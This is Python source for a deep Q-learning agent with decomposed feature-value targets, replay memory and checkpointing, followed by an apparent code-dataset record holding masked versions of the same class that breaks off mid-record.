#self.choices = choices
self.network_config = network_config
self.reinforce_config = reinforce_config
self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)
self.learning = True
self.explanation = False
self.state_length = state_length
self.features = 0
self.feature_len = feature_len
# Global
self.steps = 0
self.reward_history = []
self.episode_time_history = []
self.best_reward_mean = -maxsize
self.episode = 0
self.feature_len = feature_len
self.features = None
self.reset()
self.memory_resotre = memory_resotre
reinforce_summary_path = self.reinforce_config.summaries_path + "/" + self.name
if not self.network_config.restore_network:
clear_summary_path(reinforce_summary_path)
else:
self.restore_state()
self.summary = SummaryWriter(log_dir=reinforce_summary_path)
self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
# self.target_model.eval_mode()
self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,
initial_p=self.reinforce_config.beta_initial,
final_p=self.reinforce_config.beta_final)
self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,
initial_p=self.reinforce_config.starting_epsilon,
final_p=self.reinforce_config.final_epsilon)
# def __del__(self):
# self.save()
# self.summary.close()
def should_explore(self):
self.epsilon = self.epsilon_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Epsilon' % self.name,
scalar_value=self.epsilon,
global_step=self.steps)
return random.random() < self.epsilon
def predict(self, state, isGreedy = False, is_random = False):
if self.learning:
self.steps += 1
# add to experience
if self.previous_state is not None and self.learning and self.current_reward is not None:
state_crr = np.unique(state, axis=0)
self.memory.add(self.previous_state,
None,
self.current_reward,
state_crr.reshape(-1, self.state_length), 0,
self.features)
# print("not final : {}".format(self.current_reward) )
# print(0, self.features)
if self.learning and self.should_explore() and not isGreedy:
q_values = None
fv = None
choice = random.choice(list(range(len(state))))
action = choice
else:
with torch.no_grad():
features_vector, q_values = self.eval_model.predict_batch(Tensor(state))
q_values = FloatTensor(q_values).view(-1)
_, choice = q_values.max(0)
action = choice
fv = features_vector[choice]
# print("q_value : {}".format(q_values))
# input()
if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:
logger.debug("Replacing target model for %s" % self.name)
if self.reinforce_config.replace_frequency != 1:
self.target_model.replace(self.eval_model)
else:
self.target_model.replace_soft(self.eval_model)
# self.target_model.eval_mode()
if (self.learning and
self.steps > self.reinforce_config.update_start and
self.steps % self.reinforce_config.update_steps == 0):
self.update_time -= time.time()
self.update()
self.update_time += time.time()
self.current_reward = 0
self.previous_state = state[action]
#self.previous_action = action
return choice, fv#,q_values
def disable_learning(self, is_save = False):
logger.info("Disabled Learning for %s agent" % self.name)
if is_save:
# self.save()
self.save(force = True)
self.learning = False
self.episode = 0
def enable_learning(self):
logger.info("enabled Learning for %s agent" % self.name)
self.learning = True
self.reset()
def end_episode(self, state):
if not self.learning:
return
# print("end:")
# print(self.current_reward)
# input()
episode_time = time.time() - self.episode_time
self.reward_history.append(self.total_reward)
self.episode_time_history.append(episode_time)
total_time = sum(self.episode_time_history)
avg_time = total_time / len(self.episode_time_history)
logger.info("End of Episode %d, "
"Total reward %.2f, "
"Epsilon %.2f" % (self.episode + 1,
self.total_reward,
self.epsilon))
logger.debug("Episode Time: %.2fs (%.2fs), "
"Prediction Time: %.2f, "
"Update Time %.2f" % (episode_time,
avg_time,
self.prediction_time,
self.update_time))
self.episode += 1
self.summary.add_scalar(tag='%s/Episode Reward' % self.name,
scalar_value=self.total_reward,
global_step=self.episode)
self.memory.add(self.previous_state,
None,
self.current_reward,
state.reshape(-1, self.state_length), 1,
self.features)
# print("final : {}".format(self.current_reward) )
# input()
# print(1, self.features)
self.save()
self.reset()
def reset(self):
self.episode_time = time.time()
self.current_reward = 0
self.total_reward = 0
self.previous_state = None
self.previous_action = None
self.prediction_time = 0
self.update_time = 0
self.features = None
def restore_state(self):
restore_path = self.network_config.network_path + "/adaptive.info"
if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:
logger.info("Restoring state from %s" % self.network_config.network_path)
with open(restore_path, "rb") as file:
info = pickle.load(file)
self.steps = info["steps"]
# self.best_reward_mean = info["best_reward_mean"]
self.episode = info["episode"]
self.memory.load(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
def save(self, force=False, appendix=""):
info = {
"steps": self.steps,
"best_reward_mean": self.best_reward_mean,
"episode": self.episode
}
if (len(self.reward_history) >= self.network_config.save_steps and
self.episode % self.network_config.save_steps == 0) or force:
total_reward = sum(self.reward_history[-self.network_config.save_steps:])
current_reward_mean = total_reward / self.network_config.save_steps
if force: #or current_reward_mean >= self.best_reward_mean:
print("*************saved*****************", current_reward_mean, self.best_reward_mean)
if not force:
self.best_reward_mean = current_reward_mean
logger.info("Saving network. Found new best reward (%.2f)" % total_reward)
self.eval_model.save_network(appendix = appendix)
self.target_model.save_network(appendix = appendix)
# self.eval_model.save_network()
# self.target_model.save_network()
with open(self.network_config.network_path + "/adaptive.info", "wb") as file:
pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)
self.memory.save(self.network_config.network_path)
print("lenght of memeory: ", len(self.memory))
else:
logger.info("The best reward is still %.2f. Not saving" % self.best_reward_mean)
def reward(self, r):
self.total_reward += r
self.current_reward += r
def passFeatures(self, features):
self.features = features.copy()
return
def summary_test(self, reward, epoch):
self.summary.add_scalar(tag='%s/eval reward' % self.name,
scalar_value=reward, global_step=epoch * 40)
def summary_GVFs_loss(self, loss, epoch):
self.summary.add_scalar(tag='%s/GVFs loss' % self.name,
scalar_value=loss, global_step=epoch * 40)
def update(self):
if len(self.memory._storage) <= self.reinforce_config.batch_size:
return
# self.eval_model.train_mode()
beta = self.beta_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Beta' % self.name,
scalar_value=beta, global_step=self.steps)
if self.reinforce_config.use_prior_memory:
batch = self.memory.sample(self.reinforce_config.batch_size, beta)
(states, actions, reward, next_states,
is_terminal, weights, batch_idxes) = batch
self.summary.add_histogram(tag='%s/Batch Indices' % self.name,
values=Tensor(batch_idxes),
global_step=self.steps)
else:
batch = self.memory.sample(self.reinforce_config.batch_size)
(states, actions, reward, next_states, is_terminal, features_vector) = batch
states = FloatTensor(states)
# print(states.size())
# next_states = FloatTensor(next_states)
terminal = FloatTensor([1 if t else 0 for t in is_terminal])
reward = FloatTensor(reward)
features_vector = FloatTensor(features_vector)
batch_index = torch.arange(self.reinforce_config.batch_size,
dtype=torch.long)
# Current Q Values
feature_values, q_values = self.eval_model.predict_batch(states)
q_values = q_values.flatten()
q_max = []
f_max = []
for i, ns in enumerate(next_states):
feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))
q_value_max, idx = q_n.max(0)
features_max = feature_n[idx]
q_max.append(q_value_max)
if self.network_config.version in ["v10", "v11"]:
# print(features_max)
# print(ns[idx, 63:67])
# print(states[i, 63:67])
# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())
features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]
features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]
features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]
features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]
features_max[features_max == float('inf')] = 0
# print(features_max)
# input()
f_max.append(features_max.view(-1))
# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):
# print(terminal)
# print(features_vector)
# input()
q_max = torch.stack(q_max, dim = 1).view(-1)
f_max = torch.stack(f_max)
q_max = (1 - terminal) * q_max
f_max = (1 - terminal.view(-1, 1)) * f_max
q_target = reward + self.reinforce_config.discount_factor * q_max
f_target = features_vector + self.reinforce_config.discount_factor * f_max
# if torch.sum(reward).item() > 0:
# print(reward)
# print(feature_values)
# print(q_target)
# print(q_values)
# input()
# update model
if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:
# print("1")
# print(features_vector)
# print("2")
# print(feature_values)
# print("3")
# print(f_target)
# print("4")
# print(f_max)
# print("5")
# print(states.tolist())
# input()
f_target[f_target != f_target] = 0
self.eval_model.fit(q_values, q_target, feature_values, f_target)
# Update priorities
if self.reinforce_config.use_prior_memory:
td_errors = q_values - q_target
new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps
self.memory.update_priorities(batch_idxes, new_priorities.data)
def load_model(self, model):
self.eval_model.replace(model)
def load_weight(self, new_feature_weights, new_q_weights):
self.eval_model.feautre_model.load_state_dict(new_feature_weights)
self.eval_model.q_model.load_state_dict(new_q_weights)
|
normal
|
{
"blob_id": "424a0e8a7a80e24aec4bdb9b8c84fd9a5e6090c6",
"index": 6782,
"step-1": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n <mask token>\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n <mask token>\n <mask token>\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n <mask token>\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval 
reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n <mask token>\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-2": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s 
agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n <mask token>\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n <mask token>\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 
66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n <mask token>\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-3": "<mask token>\n\n\nclass SADQ_GQF(object):\n <mask token>\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s 
agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. 
Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n 